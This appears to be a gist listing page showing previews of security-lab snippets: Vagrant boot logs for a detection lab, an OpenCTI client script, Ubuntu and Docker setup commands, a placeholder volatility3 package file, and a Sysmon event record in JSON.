This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vagrant up dc wef win10 | |
Bringing machine 'dc' up with 'virtualbox' provider... | |
Bringing machine 'wef' up with 'virtualbox' provider... | |
Bringing machine 'win10' up with 'virtualbox' provider... | |
==> dc: Clearing any previously set forwarded ports... | |
==> dc: Fixed port collision for 22 => 2222. Now on port 2200. | |
==> dc: Clearing any previously set network interfaces... | |
==> dc: Preparing network interfaces based on configuration... | |
dc: Adapter 1: nat | |
dc: Adapter 2: hostonly |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ vagrant up logger | |
Bringing machine 'logger' up with 'virtualbox' provider... | |
==> logger: Importing base box 'bento/ubuntu-18.04'... | |
==> logger: Matching MAC address for NAT networking... | |
==> logger: Checking if box 'bento/ubuntu-18.04' version '202002.14.0' is up to date... | |
==> logger: Setting the name of the VM: logger | |
==> logger: Clearing any previously set network interfaces... | |
==> logger: Preparing network interfaces based on configuration... | |
logger: Adapter 1: nat |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Bringing machine 'logger' up with 'virtualbox' provider... | |
==> logger: Box 'bento/ubuntu-18.04' could not be found. Attempting to find and install... | |
logger: Box Provider: virtualbox | |
logger: Box Version: >= 0 | |
==> logger: Loading metadata for box 'bento/ubuntu-18.04' | |
logger: URL: https://vagrantcloud.com/bento/ubuntu-18.04 | |
==> logger: Adding box 'bento/ubuntu-18.04' (v202002.14.0) for provider: virtualbox | |
logger: Downloading: https://vagrantcloud.com/bento/boxes/ubuntu-18.04/versions/202002.14.0/providers/virtualbox.box | |
[K logger: Progress: 0% (Rate: 0*/s, Estimated time remaining: --:--:--) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding: utf-8 | |
import datetime | |
from dateutil.parser import parse | |
from pprint import pprint | |
from pycti import OpenCTIApiClient | |
api_url = "https://demo.opencti.io" | |
api_token = "609caced-7610-4c84-80b4-f3a380d1939b" | |
opencti_api_client = OpenCTIApiClient(api_url, api_token) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Fresh Ubuntu 18.04 with Virtualbox 6.1.2 | |
# Download https://ubuntu.com/download/desktop/thank-you?version=18.04.3&architecture=amd64 - ubuntu-18.04.3-desktop-amd64.iso | |
## Config | |
### 4 vCPU | |
### 4Go RAM | |
### 64Mo graphic card | |
### 50Go HDD | |
## | |
###Boot CD |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt autoremove -y | |
apt purge $( dpkg --list | grep -P -o "linux-image-\d\S+" | grep -v $(uname -r | grep -P -o ".+\d") ) | |
apt update && apt upgrade -y | |
apt remove docker docker-engine docker.io containerd runc | |
apt install \ | |
apt-transport-https \ | |
ca-certificates \ | |
curl \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import setuptools | |
setuptools.setup( | |
name="volatility3", | |
version="0.0.2", | |
author="volatilityfoundation", | |
author_email="info@volatilityfoundation.org", | |
description="Volatility 3: The volatile memory extraction framework. DUMMY PACKAGE. DO NOT USE.", | |
long_description="This is a dummy package. The official project website is available at https://github.com/volatilityfoundation/volatility3", | |
url="https://github.com/volatilityfoundation/volatility3", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
docker build \ | |
--build-arg http_proxy=$http_proxy \ | |
--build-arg HTTP_PROXY=$http_proxy \ | |
--build-arg https_proxy=$https_proxy \ | |
--build-arg HTTPS_PROXY=$https_proxy \ | |
--build-arg no_proxy=$no_proxy \ | |
--build-arg NO_PROXY=$no_proxy \ | |
-t tag:version . | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"_index": "sysmon-2017.11.24", | |
"_type": "sysmon_process", | |
"_id": "AV_v1-kZAnLqT_pijW1u", | |
"_score": 1, | |
"_source": { | |
"Task": 1, | |
"ParentImage": "C:\\Windows\\System32\\cmd.exe", | |
"LogonGuid": "{6B166207-852C-5A18-0000-00200D6D0100}", | |
"EventType": "INFO", |